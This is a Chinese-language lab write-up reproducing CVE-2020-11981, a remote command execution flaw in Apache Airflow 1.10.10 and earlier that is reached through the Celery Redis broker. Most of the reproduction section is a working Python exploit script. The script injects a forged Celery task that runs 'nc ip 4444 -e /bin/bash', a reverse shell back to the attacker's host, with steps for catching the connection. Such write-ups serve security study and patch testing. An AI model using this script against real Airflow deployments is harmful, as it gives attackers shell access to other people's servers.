CVE-2020-11981

一、漏洞信息

此漏洞为APACHE AIRFLOW CELERY 消息中间件命令执行漏洞。
受影响版本:Apache Airflow <= 1.10.10
漏洞概述:Apache Airflow是一款开源的,分布式任务调度框架。在其1.10.10版本及以前,如果攻击者控制了Celery的消息中间件(如Redis/RabbitMQ),将可以通过控制消息,在Worker进程中执行任意命令。

二、漏洞搭建

使用vulhub提供的镜像容器进行靶场搭建:

docker-compose run airflow-init #初始化数据库

docker-compose up -d #启动靶场环境

三、复现过程

1.在服务器端创建文件 命令:touch 1.py
2.输入命令vim cve-2020-11981.py,写入以下内容:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
import pickle
import json
import base64
import redis
import sys

r = redis.Redis(host=sys.argv[1], port=6379, decode_responses=True,db=0)
queue_name = 'default'
ori_str="{\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3-029f9b46e066\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"correlation_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"delivery_info\": {\"routing_key\": \"celery\", \"exchange\": \"\"}, \"reply_to\": \"fb996eec-3033-3c10-9ee1-418e1ca06db8\"}, \"content-type\": \"application/json\", \"headers\": {\"retries\": 0, \"lang\": \"py\", \"argsrepr\": \"(100, 200)\", \"expires\": null, \"task\": \"airflow.executors.celery_executor.execute_command\", \"kwargsrepr\": \"{}\", \"root_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"parent_id\": null, \"id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"origin\": \"gen1@132f65270cde\", \"eta\": null, \"group\": null, \"timelimit\": [null, null]}, \"body\": \"W1sxMDAsIDIwMF0sIHt9LCB7ImNoYWluIjogbnVsbCwgImNob3JkIjogbnVsbCwgImVycmJhY2tzIjogbnVsbCwgImNhbGxiYWNrcyI6IG51bGx9XQ==\"}"

task_dict = json.loads(ori_str)
command = ['nc', 'ip', '4444', '-e', '/bin/bash']
body=[[command], {}, {"chain": None, "chord": None, "errbacks": None, "callbacks": None}]
task_dict['body']=base64.b64encode(json.dumps(body).encode()).decode()

for i in command:
print(i,end=' ')

r.lpush(queue_name,json.dumps(task_dict))

3.然后另起一个终端,输入cpdump -i eth0 port 4444,回到原终端执行命令python3 1.py ip,即可连接到目标靶机:
image
4.修改脚本command,显示信息,如whoami:
image
5.回到服务端使用docker-compose logs airflow-worker命令查看,并进入容器观察发现成功:
image